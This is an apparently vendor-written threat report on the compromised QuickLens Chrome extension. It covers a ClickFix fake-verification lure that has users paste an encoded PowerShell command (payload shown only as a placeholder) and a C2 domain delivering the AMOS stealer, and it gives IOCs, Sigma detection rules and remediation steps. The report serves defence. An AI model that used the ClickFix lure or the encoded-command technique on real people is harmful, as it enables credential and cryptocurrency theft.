What Happened
A popular Chrome extension called QuickLens — Search Screen with Google Lens has been removed from the Chrome Web Store after being compromised to push malware via ClickFix social engineering attacks and steal cryptocurrency from thousands of users.
On February 17, 2026, version 5.8 of QuickLens was released containing malicious scripts that introduced ClickFix-style fake prompts and info-stealing capabilities. Google has since removed the extension and Chrome now automatically disables it for affected users.
How the Attack Works
The compromise follows a multi-stage attack chain combining supply chain poisoning with social engineering:
Stage 1: Extension Compromise
The legitimate QuickLens extension was updated with malicious code — either through a compromised developer account or a supply chain attack on the extension's build pipeline. Users received the malicious update automatically through Chrome's extension auto-update mechanism.
Stage 2: C2 Contact
The injected payload contacts google-update[.]icu, a domain designed to look like legitimate Google infrastructure. The C2 server responds with a secondary payload.
Stage 3: ClickFix Social Engineering
The second-stage payload displays a fake Google Update prompt. When users click the update button, they are shown a ClickFix attack — a fake verification dialog that tricks users into running malicious code on their system.
Fake prompt: "Google Chrome needs to verify you are human"
→ Instructs user to: Win+R → Paste clipboard → Enter
→ Clipboard contains: powershell -e [base64 encoded payload]
Stage 4: AMOS Stealer Deployment
Reports indicate that macOS users were targeted with AMOS (Atomic Stealer), a well-known infostealer that targets:
- Browser-stored passwords and cookies
- Cryptocurrency wallet data and private keys
- Keychain credentials
- Desktop files and documents
Why ClickFix Is So Effective
ClickFix has become one of the most successful social engineering techniques in 2026, responsible for delivering 59% of identified malware families in browser-based attacks. The technique works because:
- Bypasses browser security — the user manually executes the payload
- Looks legitimate — mimics real browser update or verification prompts
- Exploits trust — appears to come from Google Chrome itself
- Avoids detection — no file download, payload runs from clipboard
- Cross-platform — variants target both Windows (PowerShell) and macOS (Terminal)
The Bigger Picture: 337K Users Compromised
QuickLens is part of a larger wave of malicious Chrome extensions targeting cryptocurrency. Recent research found 337,000+ Chrome users compromised across multiple campaigns with capabilities including:
- Theft across 22 different browser types
- Private key and wallet address extraction
- OAuth2 token extraction from Chromium browsers
- Telegram and Discord data theft
- VPN configuration harvesting
These operations originated from 15 countries including the US, Canada, India, Japan, and across Europe.
MITRE ATT&CK Mapping
| Technique | ID | Phase |
|---|---|---|
| Supply Chain Compromise: Software Dependencies | T1195.001 | Initial Access |
| User Execution: Malicious Link | T1204.001 | Execution |
| Command and Scripting Interpreter: PowerShell | T1059.001 | Execution |
| Credentials from Password Stores: Browser | T1555.003 | Credential Access |
| Steal Web Session Cookie | T1539 | Credential Access |
| Data from Local System | T1005 | Collection |
| Exfiltration Over C2 Channel | T1041 | Exfiltration |
| Browser Extensions | T1176 | Persistence |
Indicators of Compromise
| Type | Value | Context |
|---|---|---|
| Domain | google-update[.]icu |
C2 / second-stage payload delivery |
| Extension | QuickLens v5.8+ | Compromised version |
| Malware | AMOS / Atomic Stealer | macOS infostealer payload |
Detection & Hunting
Browser Extension Audit
# List all Chrome extensions with version info (Windows)
Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" -Recurse -Filter "manifest.json" |
ForEach-Object { $m = Get-Content $_ | ConvertFrom-Json; "$($m.name) v$($m.version)" }
Network Detection
title: ClickFix C2 Domain Contact
logsource:
category: dns
detection:
selection:
query|endswith:
- 'google-update.icu'
- '-update.icu'
- '-verify.icu'
condition: selection
level: high
PowerShell ClickFix Execution
title: ClickFix PowerShell Clipboard Execution
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains:
- 'powershell'
- '-e '
ParentImage|endswith:
- '\explorer.exe'
- '\cmd.exe'
filter:
CommandLine|contains: 'WindowsUpdate'
condition: selection and not filter
level: high
Immediate Actions
-
Check your extensions — go to
chrome://extensionsand remove QuickLens immediately - Scan for malware — run a full system scan with updated AV
- Reset all browser passwords — assume stored credentials are compromised
- Move crypto to new wallets — if you used browser-based wallets, generate new keys and transfer funds
- Enable 2FA everywhere — especially on exchanges and financial accounts
- Review OAuth tokens — revoke any suspicious app authorizations
- Monitor accounts — watch for unauthorized transactions for the next 30 days
Lessons for Defenders
The QuickLens incident reinforces a critical truth: browser extensions are supply chain attack vectors. Organizations should:
- Maintain an allowlist of approved extensions via Chrome Enterprise policies
- Block side-loading and limit extension permissions
- Monitor for ClickFix indicators — clipboard-to-PowerShell execution patterns
- Educate users that legitimate services never ask you to run commands via Win+R or Terminal
Need help assessing your exposure? Request a free penetration test — currently in open beta.
Top comments (0)